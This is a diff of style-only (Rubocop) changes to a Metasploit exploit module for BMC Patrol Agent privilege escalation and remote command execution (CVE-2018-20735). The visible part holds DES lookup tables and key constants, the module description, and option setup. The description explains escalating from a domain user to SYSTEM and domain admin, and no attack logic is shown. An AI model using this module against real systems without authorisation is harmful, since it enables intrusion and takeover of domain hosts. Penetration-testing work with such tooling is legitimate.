Rubocop changes
parent
f05d86ffae
commit
59fc1ec7ab
|
@ -9,135 +9,140 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
@deflater = $nil
|
||||
@inflater = $nil
|
||||
@deflater = nil
|
||||
@inflater = nil
|
||||
|
||||
SBOXES = [
|
||||
0x20022000, 0x20000000, 0x0, 0x20022000, 0x0, 0x20022000, 0x20000000, 0x0, 0x20022000,
|
||||
0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x0, 0x20000000, 0x20000000, 0x0,
|
||||
0x22000, 0x20022000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x22000,
|
||||
0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x0, 0x0, 0x20022000, 0x22000,
|
||||
0x20000000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x22000,
|
||||
0x20022000, 0x0, 0x20022000, 0x0, 0x0, 0x20000000, 0x20022000, 0x20022000, 0x20000000,
|
||||
0x22000, 0x0, 0x22000, 0x20000000, 0x0, 0x20000000, 0x0, 0x22000, 0x20022000, 0x0,
|
||||
0x20000000, 0x22000, 0x20022000, 0x802, 0x2, 0x8000800, 0x8000802, 0x800, 0x8000002,
|
||||
0x8000002, 0x8000800, 0x8000002, 0x802, 0x802, 0x8000000, 0x8000800, 0x800,
|
||||
0x0, 0x8000002, 0x2, 0x8000000, 0x800, 0x2, 0x8000802, 0x802, 0x8000000, 0x800, 0x8000000,
|
||||
0x0, 0x2, 0x8000802, 0x0, 0x8000800, 0x8000802, 0x0, 0x0, 0x8000802, 0x800, 0x8000002,
|
||||
0x802, 0x2, 0x8000000, 0x800, 0x8000802, 0x0, 0x2, 0x8000800, 0x8000002, 0x8000000,
|
||||
0x8000800, 0x802, 0x8000802, 0x2, 0x802, 0x8000800, 0x800, 0x8000000, 0x8000002,
|
||||
0x0, 0x2, 0x800, 0x8000800, 0x802, 0x8000000, 0x8000802, 0x0, 0x8000002, 0x2200004,
|
||||
0x0, 0x2200000, 0x0, 0x4, 0x2200004, 0x2200000, 0x2200000, 0x2200000, 0x4, 0x4, 0x2200000,
|
||||
0x4, 0x2200000, 0x0, 0x4, 0x0, 0x2200004, 0x4, 0x2200000, 0x2200004, 0x0, 0x0, 0x4, 0x2200004,
|
||||
0x2200004, 0x2200000, 0x4, 0x0, 0x0, 0x2200004, 0x2200004, 0x4, 0x2200000, 0x2200000,
|
||||
0x2200004, 0x2200004, 0x4, 0x4, 0x0, 0x0, 0x2200004, 0x0, 0x4, 0x2200000, 0x0, 0x2200004,
|
||||
0x2200004, 0x2200000, 0x2200000, 0x0, 0x4, 0x4, 0x2200004, 0x2200000, 0x0, 0x4, 0x0,
|
||||
0x2200004, 0x2200000, 0x2200004, 0x4, 0x0, 0x2200000, 0x1100004, 0x0, 0x4, 0x1100004,
|
||||
0x1100000, 0x0, 0x1100000, 0x4, 0x0, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100004, 0x1100004,
|
||||
0x0, 0x4, 0x1100000, 0x1100004, 0x0, 0x4, 0x1100000, 0x0, 0x4, 0x1100000, 0x4, 0x1100004,
|
||||
0x1100000, 0x1100000, 0x4, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100000, 0x4, 0x1100004,
|
||||
0x4, 0x1100000, 0x0, 0x1100000, 0x0, 0x4, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100000,
|
||||
0x1100004, 0x0, 0x0, 0x1100000, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100004, 0x4, 0x0,
|
||||
0x1100000, 0x1100000, 0x0, 0x1100004, 0x4, 0x0, 0x10000400, 0x400, 0x400, 0x10000000,
|
||||
0x0, 0x400, 0x10000400, 0x400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x400,
|
||||
0x0, 0x10000000, 0x0, 0x10000000, 0x10000400, 0x400, 0x400, 0x10000400, 0x10000000,
|
||||
0x0, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x10000400, 0x0, 0x0, 0x10000400,
|
||||
0x10000400, 0x400, 0x0, 0x10000000, 0x400, 0x10000000, 0x10000000, 0x400, 0x0,
|
||||
0x10000400, 0x10000400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x0, 0x10000400,
|
||||
0x0, 0x0, 0x10000400, 0x10000000, 0x400, 0x400, 0x10000400, 0x400, 0x0, 0x10000000,
|
||||
0x400, 0x0, 0x10000400, 0x400, 0x10000000, 0x4011000, 0x11001, 0x0, 0x4011000,
|
||||
0x4000001, 0x11000, 0x4011000, 0x1, 0x11000, 0x1, 0x11001, 0x4000000, 0x4011001,
|
||||
0x4000000, 0x4000000, 0x4011001, 0x0, 0x4000001, 0x11001, 0x0, 0x4000000, 0x4011001,
|
||||
0x1, 0x4011000, 0x4011001, 0x11000, 0x4000001, 0x11001, 0x1, 0x0, 0x11000, 0x4000001,
|
||||
0x11001, 0x0, 0x4000000, 0x1, 0x4000000, 0x4000001, 0x11001, 0x4011000, 0x0, 0x11001,
|
||||
0x1, 0x4011001, 0x4000001, 0x11000, 0x4011001, 0x4000000, 0x4000001, 0x4011000,
|
||||
0x11000, 0x4011001, 0x1, 0x11000, 0x4011000, 0x1, 0x11000, 0x0, 0x4011001, 0x4000000,
|
||||
0x4011000, 0x4000001, 0x0, 0x11001, 0x40002, 0x40000, 0x2, 0x40002, 0x0, 0x0, 0x40002,
|
||||
0x2, 0x40000, 0x2, 0x0, 0x40002, 0x2, 0x40002, 0x0, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40000,
|
||||
0x40002, 0x0, 0x40000, 0x40002, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40002, 0x0, 0x2, 0x40002,
|
||||
0x0, 0x2, 0x40000, 0x40000, 0x2, 0x0, 0x40002, 0x0, 0x40000, 0x2, 0x0, 0x2, 0x40000, 0x40000,
|
||||
0x0, 0x40002, 0x40002, 0x0, 0x40002, 0x2, 0x40000, 0x40002, 0x2, 0x40000, 0x0, 0x40002,
|
||||
0x40002, 0x0, 0x2, 0x40000, 0x20000110, 0x40000, 0x20000000, 0x20040110, 0x0, 0x40110,
|
||||
0x20040000, 0x20000110, 0x40110, 0x20040000, 0x40000, 0x20000000, 0x20040000,
|
||||
0x20000110, 0x110, 0x40000, 0x20040110, 0x110, 0x0, 0x20000000, 0x110, 0x20040000,
|
||||
0x40110, 0x0, 0x20000000, 0x0, 0x20000110, 0x40110, 0x40000, 0x20040110, 0x20040110,
|
||||
0x110, 0x20040110, 0x20000000, 0x110, 0x20040000, 0x110, 0x40000, 0x20000000,
|
||||
0x40110, 0x20040000, 0x0, 0x0, 0x20000110, 0x0, 0x20040110, 0x40110, 0x0, 0x40000,
|
||||
0x20040110, 0x20000110, 0x110, 0x20040110, 0x20000000, 0x40000, 0x20000110,
|
||||
0x20000110, 0x110, 0x40110, 0x20040000, 0x20000000, 0x40000, 0x20040000, 0x40110,
|
||||
0x0, 0x4000000, 0x11000, 0x4011008, 0x4000008, 0x11000, 0x4011008, 0x4000000,
|
||||
0x4000000, 0x8, 0x8, 0x4011000, 0x11008, 0x4000008, 0x4011000, 0x0, 0x4011000, 0x0,
|
||||
0x4000008, 0x11008, 0x11000, 0x4011008, 0x0, 0x8, 0x8, 0x11008, 0x4011008, 0x4000008,
|
||||
0x4000000, 0x11000, 0x11008, 0x4011000, 0x4011000, 0x11008, 0x4000008, 0x4000000,
|
||||
0x4000000, 0x8, 0x8, 0x11000, 0x0, 0x4011000, 0x4011008, 0x0, 0x4011008, 0x0, 0x11000,
|
||||
0x4000008, 0x11008, 0x11000, 0x0, 0x4011008, 0x4000008, 0x4011000, 0x11008, 0x4000000,
|
||||
0x4011000, 0x4000008, 0x11000, 0x11008, 0x8, 0x4011008, 0x4000000, 0x8, 0x22000,
|
||||
0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000,
|
||||
0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000,
|
||||
0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000,
|
||||
0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000,
|
||||
0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x110, 0x110,
|
||||
0x0, 0x80000, 0x110, 0x80000, 0x80110, 0x0, 0x80110, 0x80110, 0x80000, 0x0, 0x80000,
|
||||
0x110, 0x0, 0x80110, 0x0, 0x80110, 0x110, 0x0, 0x80000, 0x110, 0x80000, 0x110, 0x80110,
|
||||
0x0, 0x0, 0x80110, 0x110, 0x80000, 0x80110, 0x80000, 0x80110, 0x0, 0x80000, 0x80110,
|
||||
0x80000, 0x110, 0x0, 0x80000, 0x0, 0x80000, 0x110, 0x0, 0x110, 0x80110, 0x80000, 0x110,
|
||||
0x80110, 0x80000, 0x0, 0x80110, 0x110, 0x0, 0x80110, 0x0, 0x80000, 0x110, 0x80110,
|
||||
0x80000, 0x0, 0x80110, 0x110, 0x110, 0x2200000, 0x8, 0x0, 0x2200008, 0x8, 0x0, 0x2200000,
|
||||
0x8, 0x0, 0x2200008, 0x8, 0x2200000, 0x2200000, 0x2200000, 0x2200008, 0x8, 0x8, 0x2200000,
|
||||
0x2200008, 0x0, 0x0, 0x0, 0x2200008, 0x2200008, 0x2200008, 0x2200008, 0x2200000,
|
||||
0x0, 0x0, 0x8, 0x8, 0x2200000, 0x0, 0x2200000, 0x2200000, 0x8, 0x2200008, 0x8, 0x0, 0x2200000,
|
||||
0x2200000, 0x0, 0x2200008, 0x8, 0x8, 0x2200008, 0x8, 0x0, 0x2200008, 0x8, 0x8, 0x2200000,
|
||||
0x2200000, 0x2200008, 0x8, 0x0, 0x0, 0x2200000, 0x2200000, 0x2200008, 0x2200008,
|
||||
0x0, 0x0, 0x2200008, 0x1100000, 0x800, 0x800, 0x1, 0x1100801, 0x1100001, 0x1100800,
|
||||
0x0, 0x0, 0x801, 0x801, 0x1100000, 0x1, 0x1100800, 0x1100000, 0x801, 0x801, 0x1100000,
|
||||
0x1100001, 0x1100801, 0x0, 0x800, 0x1, 0x1100800, 0x1100001, 0x1100801, 0x1100800,
|
||||
0x1, 0x1100801, 0x1100001, 0x800, 0x0, 0x1100801, 0x1100000, 0x1100001, 0x801,
|
||||
0x1100000, 0x800, 0x0, 0x1100001, 0x801, 0x1100801, 0x1100800, 0x0, 0x800, 0x1, 0x1,
|
||||
0x800, 0x0, 0x801, 0x800, 0x1100800, 0x801, 0x1100000, 0x1100801, 0x0, 0x1100800,
|
||||
0x1, 0x1100001, 0x1100801, 0x1, 0x1100800, 0x1100000, 0x1100001, 0x0, 0x0, 0x400,
|
||||
0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, 0x10000400, 0x10000000, 0x400,
|
||||
0x10000000, 0x400, 0x400, 0x10000000, 0x10000400, 0x0, 0x10000000, 0x10000400,
|
||||
0x0, 0x400, 0x10000400, 0x0, 0x10000400, 0x10000000, 0x400, 0x10000000, 0x10000000,
|
||||
0x10000400, 0x0, 0x400, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400,
|
||||
0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x0, 0x10000400, 0x10000000, 0x400,
|
||||
0x0, 0x10000400, 0x400, 0x0, 0x10000000, 0x0, 0x10000400, 0x400, 0x400, 0x10000000,
|
||||
0x10000000, 0x10000400, 0x10000400, 0x400, 0x400, 0x10000000, 0x220, 0x8000000,
|
||||
0x8000220, 0x0, 0x8000000, 0x220, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220,
|
||||
0x8000220, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, 0x220, 0x8000000, 0x8000220,
|
||||
0x220, 0x0, 0x8000000, 0x0, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000000, 0x220,
|
||||
0x0, 0x8000000, 0x220, 0x8000220, 0x8000220, 0x0, 0x0, 0x8000000, 0x220, 0x8000220,
|
||||
0x8000000, 0x220, 0x8000000, 0x220, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220,
|
||||
0x8000000, 0x8000220, 0x8000220, 0x0, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220,
|
||||
0x8000000, 0x8000220, 0x80220, 0x80220, 0x0, 0x0, 0x80000, 0x220, 0x80220, 0x80220,
|
||||
0x0, 0x80000, 0x220, 0x0, 0x220, 0x80000, 0x80000, 0x80220, 0x0, 0x220, 0x220, 0x80000,
|
||||
0x80220, 0x80000, 0x0, 0x220, 0x80000, 0x220, 0x80000, 0x80220, 0x220, 0x0, 0x80220,
|
||||
0x0, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x80000, 0x0, 0x220, 0x80220, 0x80000, 0x80000,
|
||||
0x220, 0x80220, 0x0, 0x220, 0x80000, 0x80220, 0x220, 0x80220, 0x80000, 0x220, 0x0,
|
||||
0x80000, 0x80220, 0x0, 0x80220, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x220
|
||||
].freeze
|
||||
|
||||
SBOXES = [ 0x20022000,0x20000000,0x0,0x20022000,0x0,0x20022000,0x20000000,0x0,0x20022000,
|
||||
0x20022000,0x20000000,0x22000,0x22000,0x0,0x0,0x20000000,0x20000000,0x0,
|
||||
0x22000,0x20022000,0x20022000,0x20000000,0x22000,0x22000,0x0,0x22000,
|
||||
0x20022000,0x20000000,0x22000,0x22000,0x20000000,0x0,0x0,0x20022000,0x22000,
|
||||
0x20000000,0x20022000,0x20000000,0x22000,0x22000,0x20000000,0x22000,
|
||||
0x20022000,0x0,0x20022000,0x0,0x0,0x20000000,0x20022000,0x20022000,0x20000000,
|
||||
0x22000,0x0,0x22000,0x20000000,0x0,0x20000000,0x0,0x22000,0x20022000,0x0,
|
||||
0x20000000,0x22000,0x20022000,0x802,0x2,0x8000800,0x8000802,0x800,0x8000002,
|
||||
0x8000002,0x8000800,0x8000002,0x802,0x802,0x8000000,0x8000800,0x800,
|
||||
0x0,0x8000002,0x2,0x8000000,0x800,0x2,0x8000802,0x802,0x8000000,0x800,0x8000000,
|
||||
0x0,0x2,0x8000802,0x0,0x8000800,0x8000802,0x0,0x0,0x8000802,0x800,0x8000002,
|
||||
0x802,0x2,0x8000000,0x800,0x8000802,0x0,0x2,0x8000800,0x8000002,0x8000000,
|
||||
0x8000800,0x802,0x8000802,0x2,0x802,0x8000800,0x800,0x8000000,0x8000002,
|
||||
0x0,0x2,0x800,0x8000800,0x802,0x8000000,0x8000802,0x0,0x8000002,0x2200004,
|
||||
0x0,0x2200000,0x0,0x4,0x2200004,0x2200000,0x2200000,0x2200000,0x4,0x4,0x2200000,
|
||||
0x4,0x2200000,0x0,0x4,0x0,0x2200004,0x4,0x2200000,0x2200004,0x0,0x0,0x4,0x2200004,
|
||||
0x2200004,0x2200000,0x4,0x0,0x0,0x2200004,0x2200004,0x4,0x2200000,0x2200000,
|
||||
0x2200004,0x2200004,0x4,0x4,0x0,0x0,0x2200004,0x0,0x4,0x2200000,0x0,0x2200004,
|
||||
0x2200004,0x2200000,0x2200000,0x0,0x4,0x4,0x2200004,0x2200000,0x0,0x4,0x0,
|
||||
0x2200004,0x2200000,0x2200004,0x4,0x0,0x2200000,0x1100004,0x0,0x4,0x1100004,
|
||||
0x1100000,0x0,0x1100000,0x4,0x0,0x1100004,0x0,0x1100000,0x4,0x1100004,0x1100004,
|
||||
0x0,0x4,0x1100000,0x1100004,0x0,0x4,0x1100000,0x0,0x4,0x1100000,0x4,0x1100004,
|
||||
0x1100000,0x1100000,0x4,0x0,0x1100004,0x4,0x1100004,0x1100000,0x4,0x1100004,
|
||||
0x4,0x1100000,0x0,0x1100000,0x0,0x4,0x1100004,0x0,0x1100000,0x4,0x1100000,
|
||||
0x1100004,0x0,0x0,0x1100000,0x0,0x1100004,0x4,0x1100004,0x1100004,0x4,0x0,
|
||||
0x1100000,0x1100000,0x0,0x1100004,0x4,0x0,0x10000400,0x400,0x400,0x10000000,
|
||||
0x0,0x400,0x10000400,0x400,0x10000000,0x10000000,0x0,0x10000400,0x400,
|
||||
0x0,0x10000000,0x0,0x10000000,0x10000400,0x400,0x400,0x10000400,0x10000000,
|
||||
0x0,0x10000000,0x400,0x10000400,0x10000000,0x10000400,0x0,0x0,0x10000400,
|
||||
0x10000400,0x400,0x0,0x10000000,0x400,0x10000000,0x10000000,0x400,0x0,
|
||||
0x10000400,0x10000400,0x10000000,0x10000000,0x0,0x10000400,0x0,0x10000400,
|
||||
0x0,0x0,0x10000400,0x10000000,0x400,0x400,0x10000400,0x400,0x0,0x10000000,
|
||||
0x400,0x0,0x10000400,0x400,0x10000000,0x4011000,0x11001,0x0,0x4011000,
|
||||
0x4000001,0x11000,0x4011000,0x1,0x11000,0x1,0x11001,0x4000000,0x4011001,
|
||||
0x4000000,0x4000000,0x4011001,0x0,0x4000001,0x11001,0x0,0x4000000,0x4011001,
|
||||
0x1,0x4011000,0x4011001,0x11000,0x4000001,0x11001,0x1,0x0,0x11000,0x4000001,
|
||||
0x11001,0x0,0x4000000,0x1,0x4000000,0x4000001,0x11001,0x4011000,0x0,0x11001,
|
||||
0x1,0x4011001,0x4000001,0x11000,0x4011001,0x4000000,0x4000001,0x4011000,
|
||||
0x11000,0x4011001,0x1,0x11000,0x4011000,0x1,0x11000,0x0,0x4011001,0x4000000,
|
||||
0x4011000,0x4000001,0x0,0x11001,0x40002,0x40000,0x2,0x40002,0x0,0x0,0x40002,
|
||||
0x2,0x40000,0x2,0x0,0x40002,0x2,0x40002,0x0,0x0,0x2,0x40000,0x40000,0x2,0x40000,
|
||||
0x40002,0x0,0x40000,0x40002,0x0,0x2,0x40000,0x40000,0x2,0x40002,0x0,0x2,0x40002,
|
||||
0x0,0x2,0x40000,0x40000,0x2,0x0,0x40002,0x0,0x40000,0x2,0x0,0x2,0x40000,0x40000,
|
||||
0x0,0x40002,0x40002,0x0,0x40002,0x2,0x40000,0x40002,0x2,0x40000,0x0,0x40002,
|
||||
0x40002,0x0,0x2,0x40000,0x20000110,0x40000,0x20000000,0x20040110,0x0,0x40110,
|
||||
0x20040000,0x20000110,0x40110,0x20040000,0x40000,0x20000000,0x20040000,
|
||||
0x20000110,0x110,0x40000,0x20040110,0x110,0x0,0x20000000,0x110,0x20040000,
|
||||
0x40110,0x0,0x20000000,0x0,0x20000110,0x40110,0x40000,0x20040110,0x20040110,
|
||||
0x110,0x20040110,0x20000000,0x110,0x20040000,0x110,0x40000,0x20000000,
|
||||
0x40110,0x20040000,0x0,0x0,0x20000110,0x0,0x20040110,0x40110,0x0,0x40000,
|
||||
0x20040110,0x20000110,0x110,0x20040110,0x20000000,0x40000,0x20000110,
|
||||
0x20000110,0x110,0x40110,0x20040000,0x20000000,0x40000,0x20040000,0x40110,
|
||||
0x0,0x4000000,0x11000,0x4011008,0x4000008,0x11000,0x4011008,0x4000000,
|
||||
0x4000000,0x8,0x8,0x4011000,0x11008,0x4000008,0x4011000,0x0,0x4011000,0x0,
|
||||
0x4000008,0x11008,0x11000,0x4011008,0x0,0x8,0x8,0x11008,0x4011008,0x4000008,
|
||||
0x4000000,0x11000,0x11008,0x4011000,0x4011000,0x11008,0x4000008,0x4000000,
|
||||
0x4000000,0x8,0x8,0x11000,0x0,0x4011000,0x4011008,0x0,0x4011008,0x0,0x11000,
|
||||
0x4000008,0x11008,0x11000,0x0,0x4011008,0x4000008,0x4011000,0x11008,0x4000000,
|
||||
0x4011000,0x4000008,0x11000,0x11008,0x8,0x4011008,0x4000000,0x8,0x22000,
|
||||
0x0,0x0,0x22000,0x22000,0x22000,0x0,0x22000,0x0,0x0,0x22000,0x0,0x22000,0x22000,
|
||||
0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x22000,0x22000,
|
||||
0x0,0x22000,0x0,0x0,0x22000,0x22000,0x22000,0x0,0x22000,0x0,0x0,0x22000,0x22000,
|
||||
0x22000,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x22000,
|
||||
0x22000,0x0,0x0,0x0,0x22000,0x22000,0x0,0x0,0x0,0x22000,0x22000,0x110,0x110,
|
||||
0x0,0x80000,0x110,0x80000,0x80110,0x0,0x80110,0x80110,0x80000,0x0,0x80000,
|
||||
0x110,0x0,0x80110,0x0,0x80110,0x110,0x0,0x80000,0x110,0x80000,0x110,0x80110,
|
||||
0x0,0x0,0x80110,0x110,0x80000,0x80110,0x80000,0x80110,0x0,0x80000,0x80110,
|
||||
0x80000,0x110,0x0,0x80000,0x0,0x80000,0x110,0x0,0x110,0x80110,0x80000,0x110,
|
||||
0x80110,0x80000,0x0,0x80110,0x110,0x0,0x80110,0x0,0x80000,0x110,0x80110,
|
||||
0x80000,0x0,0x80110,0x110,0x110,0x2200000,0x8,0x0,0x2200008,0x8,0x0,0x2200000,
|
||||
0x8,0x0,0x2200008,0x8,0x2200000,0x2200000,0x2200000,0x2200008,0x8,0x8,0x2200000,
|
||||
0x2200008,0x0,0x0,0x0,0x2200008,0x2200008,0x2200008,0x2200008,0x2200000,
|
||||
0x0,0x0,0x8,0x8,0x2200000,0x0,0x2200000,0x2200000,0x8,0x2200008,0x8,0x0,0x2200000,
|
||||
0x2200000,0x0,0x2200008,0x8,0x8,0x2200008,0x8,0x0,0x2200008,0x8,0x8,0x2200000,
|
||||
0x2200000,0x2200008,0x8,0x0,0x0,0x2200000,0x2200000,0x2200008,0x2200008,
|
||||
0x0,0x0,0x2200008,0x1100000,0x800,0x800,0x1,0x1100801,0x1100001,0x1100800,
|
||||
0x0,0x0,0x801,0x801,0x1100000,0x1,0x1100800,0x1100000,0x801,0x801,0x1100000,
|
||||
0x1100001,0x1100801,0x0,0x800,0x1,0x1100800,0x1100001,0x1100801,0x1100800,
|
||||
0x1,0x1100801,0x1100001,0x800,0x0,0x1100801,0x1100000,0x1100001,0x801,
|
||||
0x1100000,0x800,0x0,0x1100001,0x801,0x1100801,0x1100800,0x0,0x800,0x1,0x1,
|
||||
0x800,0x0,0x801,0x800,0x1100800,0x801,0x1100000,0x1100801,0x0,0x1100800,
|
||||
0x1,0x1100001,0x1100801,0x1,0x1100800,0x1100000,0x1100001,0x0,0x0,0x400,
|
||||
0x10000400,0x10000400,0x10000000,0x0,0x0,0x400,0x10000400,0x10000000,0x400,
|
||||
0x10000000,0x400,0x400,0x10000000,0x10000400,0x0,0x10000000,0x10000400,
|
||||
0x0,0x400,0x10000400,0x0,0x10000400,0x10000000,0x400,0x10000000,0x10000000,
|
||||
0x10000400,0x0,0x400,0x10000000,0x400,0x10000400,0x10000000,0x0,0x0,0x400,
|
||||
0x10000400,0x10000400,0x10000000,0x0,0x0,0x0,0x10000400,0x10000000,0x400,
|
||||
0x0,0x10000400,0x400,0x0,0x10000000,0x0,0x10000400,0x400,0x400,0x10000000,
|
||||
0x10000000,0x10000400,0x10000400,0x400,0x400,0x10000000,0x220,0x8000000,
|
||||
0x8000220,0x0,0x8000000,0x220,0x0,0x8000220,0x220,0x0,0x8000000,0x8000220,
|
||||
0x8000220,0x8000220,0x220,0x0,0x8000000,0x8000220,0x220,0x8000000,0x8000220,
|
||||
0x220,0x0,0x8000000,0x0,0x0,0x8000220,0x220,0x0,0x8000000,0x8000000,0x220,
|
||||
0x0,0x8000000,0x220,0x8000220,0x8000220,0x0,0x0,0x8000000,0x220,0x8000220,
|
||||
0x8000000,0x220,0x8000000,0x220,0x220,0x8000000,0x8000220,0x0,0x0,0x220,
|
||||
0x8000000,0x8000220,0x8000220,0x0,0x220,0x8000000,0x8000220,0x0,0x0,0x220,
|
||||
0x8000000,0x8000220,0x80220,0x80220,0x0,0x0,0x80000,0x220,0x80220,0x80220,
|
||||
0x0,0x80000,0x220,0x0,0x220,0x80000,0x80000,0x80220,0x0,0x220,0x220,0x80000,
|
||||
0x80220,0x80000,0x0,0x220,0x80000,0x220,0x80000,0x80220,0x220,0x0,0x80220,
|
||||
0x0,0x220,0x0,0x80000,0x80220,0x0,0x80000,0x0,0x220,0x80220,0x80000,0x80000,
|
||||
0x220,0x80220,0x0,0x220,0x80000,0x80220,0x220,0x80220,0x80000,0x220,0x0,
|
||||
0x80000,0x80220,0x0,0x80220,0x220,0x0,0x80000,0x80220,0x0,0x220]
|
||||
PC1 = "\x38\x30\x28\x20\x18\x10\x8\x0\x39\x31\x29\x21\x19\x11\x9"\
|
||||
"\x1\x3A\x32\x2A\x22\x1A\x12\x0A\x2\x3B\x33\x2B\x23\x3E\x36"\
|
||||
"\x2E\x26\x1E\x16\x0E\x6\x3D\x35\x2D\x25\x1D\x15\x0D\x5\x3C"\
|
||||
"\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0"
|
||||
"\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0".freeze
|
||||
|
||||
PC2 = "\x0D\x10\x0A\x17\x0\x4\x2\x1B\x0E\x5\x14\x9\x16\x12\x0B\x3"\
|
||||
"\x19\x7\x0F\x6\x1A\x13\x0C\x1\x28\x33\x1E\x24\x2E\x36\x1D"\
|
||||
"\x27\x32\x2C\x20\x2F\x2B\x30\x26\x37\x21\x34\x2D\x29\x31"\
|
||||
"\x23\x1C\x1F"
|
||||
SBOX_BYTE_ORDER = [ 1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000,
|
||||
0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000,
|
||||
0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000,
|
||||
0x40000000, 0x80000000 ]
|
||||
"\x23\x1C\x1F".freeze
|
||||
|
||||
ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1"
|
||||
INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e"
|
||||
INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8"
|
||||
#@des_keysch_0 = $nil
|
||||
#@des_keysch_1 = $nil
|
||||
SBOX_BYTE_ORDER = [
|
||||
1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000,
|
||||
0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000,
|
||||
0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000,
|
||||
0x40000000, 0x80000000
|
||||
].freeze
|
||||
|
||||
ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1".freeze
|
||||
INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e".freeze
|
||||
INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8".freeze
|
||||
|
||||
DES_ENCRYPT = 0
|
||||
|
||||
def initialize(info={})
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'BMC Patrol Agent Privilege Escalation Cmd Execution',
|
||||
'Description' => %q{
|
||||
'Description' => %q(
|
||||
This module leverages the remote command execution feature provided by
|
||||
the BMC Patrol Agent software. It can also be used to escalate privileges
|
||||
on Windows hosts as the software runs as SYSTEM but only verfies that the password
|
||||
|
@ -146,19 +151,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
|
||||
powershell to execute the payload. The powershell version tends to timeout on
|
||||
the first run so it may take multiple tries.
|
||||
},
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
|
||||
'b0yd' # @rwincey / Vulnerability Discovery and MSF module author
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2018-20735'],
|
||||
['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/']
|
||||
],
|
||||
'Platform' => ['win','linux'],
|
||||
'Targets' =>
|
||||
'Platform' => ['win', 'linux'],
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows Powershell Injected Shellcode', {
|
||||
|
@ -175,18 +180,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'DisablePayloadHandler' => true,
|
||||
'DisablePayloadHandler' => true
|
||||
},
|
||||
'DisclosureDate' => 'Jan 17 2019'))
|
||||
|
||||
register_options([
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3181),
|
||||
OptString.new('USER', [ true, 'local or domain user to authenticate with patrol', 'patrol' ]),
|
||||
OptString.new('PASSWORD', [ true, 'password to authenticate with patrol', 'password' ]),
|
||||
OptString.new('CMD', [ false, 'command to run on the target. If this option is specified the payload will be ignored.' ])
|
||||
])
|
||||
OptString.new('USER', [true, 'local or domain user to authenticate with patrol', 'patrol']),
|
||||
OptString.new('PASSWORD', [true, 'password to authenticate with patrol', 'password']),
|
||||
